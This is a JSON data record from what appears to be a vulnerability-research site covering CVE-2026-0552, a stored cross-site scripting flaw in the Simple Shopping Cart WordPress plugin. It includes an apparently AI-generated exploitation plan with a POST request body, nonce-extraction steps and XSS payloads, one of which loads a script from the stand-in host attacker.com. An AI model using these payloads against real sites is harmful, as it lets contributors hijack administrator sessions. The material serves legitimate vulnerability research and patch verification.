[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$faUWZMEVJxI29wLKaAj7X_D2iq4p2JfzLRBH5aAH2cfU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":36},"CVE-2026-0552","simple-shopping-cart-authenticated-contributor-stored-cross-site-scripting-via-wpscdisplayproduct-shortcode","Simple Shopping Cart \u003C= 5.2.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'wpsc_display_product' Shortcode","The Simple Shopping Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpsc_display_product' shortcode in all versions up to, and including, 5.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wordpress-simple-paypal-shopping-cart",null,"\u003C=5.2.4","5.2.5","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-03 19:30:41","2026-04-04 07:42:01",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa8e222d1-cb03-4498-9776-e050eb501e9f?source=api-prod",1,[22,23,24,25,26,27,28],"includes\u002Fadmin\u002Fwp_shopping_cart_menu_stripe_settings.php","includes\u002Fwpsc-misc-checkout-ajax-handler.php","includes\u002Fwpsc-misc-functions.php","readme.txt","stripe.php","wp_shopping_cart.php","wp_shopping_cart_shortcodes.php","researched",false,3,"This research plan outlines the steps to exploit a Stored Cross-Site Scripting (XSS) vulnerability in the Simple Shopping Cart plugin (\u003C= 5.2.4) via the `wpsc_display_product` shortcode.\n\n### 1. Vulnerability Summary\nThe `Simple Shopping Cart` plugin registers the `[wpsc_display_product]` shortcode (and its alias `[wp_cart_display_product]`) to render product display boxes. The handler function `wpsc_cart_display_product_handler` fails to sanitize or escape the `description` attribute before echoing it into the page. An attacker with `Contributor` level permissions or higher can create a post containing this shortcode and inject malicious JavaScript into the `description` attribute, which executes when any user views the post.\n\n### 2. Attack Vector Analysis\n*   **Shortcode:** `[wpsc_display_product]`\n*   **Vulnerable Attribute:** `description`\n*   **Authentication Required:** Authenticated (`Contributor` level or higher).\n*   **Endpoint:** WordPress Post Editor (to store the payload) and the Post View\u002FPreview page (to trigger execution).\n*   **Payload Location:** The attribute value is stored in the `post_content` field of the `wp_posts` table.\n\n### 3. Code Flow\n1.  **Entry Point:** The plugin registers shortcodes in `wp_shopping_cart_shortcodes.php` via `wpsc_register_shortcodes()`.\n2.  **Shortcode Registration:** `add_shortcode('wpsc_display_product', 'wpsc_cart_display_product_handler' );`\n3.  **Attribute Extraction:** In `wpsc_cart_display_product_handler($atts)`, the attributes are extracted using `shortcode_atts()`.\n4.  **The Sink (Vulnerable Point):**\n    ```php\n    \u002F\u002F File: wp_shopping_cart_shortcodes.php\n    \u002F\u002F Function: wpsc_cart_display_product_handler\n    \n    \u002F\u002F ... extracts attributes into variables including $description ...\n    \n    \u003Cdiv class=\"wp_cart_product_description\">\n        \u003C?php echo $description ?>\n    \u003C\u002Fdiv>\n    ```\n    The variable `$description` is echoed directly without calling `esc_html()`, `wp_kses()`, or any other sanitization function.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability involves a shortcode rendered during standard post display. No specific plugin-side AJAX nonce is required for the *execution* of the XSS. However, a WordPress core nonce is required to *save* the post as a Contributor.\n\n1.  **Login:** Authenticate as a Contributor.\n2.  **Navigate to Editor:** Use `browser_navigate` to go to `wp-admin\u002Fpost-new.php`.\n3.  **Extract Nonce:** Use `browser_eval` to extract the `_wpnonce` from the form field `name=\"_wpnonce\"`.\n    *   JS: `document.querySelector('input[name=\"_wpnonce\"]').value`\n4.  **Post Creation:** Submit the post containing the malicious shortcode using the `http_request` tool.\n\n### 5. Exploitation Strategy\nThe goal is to store a payload that executes in the context of an administrator viewing the post.\n\n*   **Payload:** `[wpsc_display_product name=\"Attack Product\" price=\"1\" description=\"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"]`\n*   **Step-by-Step:**\n    1.  Log in to the WordPress site as a user with the `contributor` role.\n    2.  Obtain a valid `_wpnonce` for creating a post (as described in section 4).\n    3.  Send a `POST` request to `wp-admin\u002Fpost.php` to create a new draft post:\n        *   **URL:** `https:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fpost.php`\n        *   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n        *   **Body:**\n            ```\n            _wpnonce=\u003CNONCE>&action=editpost&post_ID=\u003CNEW_ID>&post_title=XSS_PoC&content=[wpsc_display_product name=\"Attack\" price=\"1\" description=\"\u003Cscript src='https:\u002F\u002Fattacker.com\u002Fpayload.js'>\u003C\u002Fscript>\"]&post_status=draft\n            ```\n            *(Note: A simple `\u003Cscript>alert(1)\u003C\u002Fscript>` is sufficient for a PoC).*\n    4.  Retrieve the URL of the created post (or its preview link).\n    5.  As an administrator, navigate to that post URL.\n    6.  Observe the JavaScript execution.\n\n### 6. Test Data Setup\n1.  **User:** Create a user with username `contributor_user` and role `contributor`.\n2.  **Plugin State:** Ensure the \"Simple Shopping Cart\" plugin is active.\n3.  **Settings:** No specific plugin settings are required to trigger the shortcode rendering.\n\n### 7. Expected Results\n*   The shortcode should render a product display box.\n*   Inside the `\u003Cdiv class=\"wp_cart_product_description\">`, the raw script tag should be present.\n*   The browser should execute the JavaScript, resulting in an alert or external network request.\n\n### 8. Verification Steps\n1.  **Verify Storage:** Use WP-CLI to check the post content:\n    `wp post get \u003CPOST_ID> --field=post_content`\n2.  **Verify Unescaped Output:** Perform an unauthenticated (or admin) HTTP request to the post URL and check for the raw payload:\n    `curl -s https:\u002F\u002F\u003Ctarget>\u002Fpost-url\u002F | grep \"wp_cart_product_description\"`\n3.  **Database Check:** Confirm the string is stored in the database without entities:\n    `wp db query \"SELECT post_content FROM wp_posts WHERE ID = \u003CPOST_ID>\"`\n\n### 9. Alternative Approaches\n*   **Attribute Breakout:** If the `name` or `price` attributes were slightly better sanitized but still allowed attribute injection, we could try breaking out of attributes like `alt` or `value`. However, `description` is a direct `echo` sink, making it the highest-priority target.\n*   **Thumbnail XSS:** If the `description` was patched, the `thumbnail` attribute uses `esc_url_raw`. While generally safe, if the plugin uses it in a context other than `src` (like an `onmouseover`), it could be exploited. In the current source, it is correctly used in `src`.\n*   **Shortcode Aliases:** Test both `[wpsc_display_product]` and `[wp_cart_display_product]` as they share the same handler.","gemini-3-flash-preview","2026-04-17 21:42:16","2026-04-17 21:42:45",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","5.2.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwordpress-simple-paypal-shopping-cart\u002Ftags\u002F5.2.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwordpress-simple-paypal-shopping-cart.5.2.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwordpress-simple-paypal-shopping-cart\u002Ftags\u002F5.2.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwordpress-simple-paypal-shopping-cart.5.2.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwordpress-simple-paypal-shopping-cart\u002Ftags"]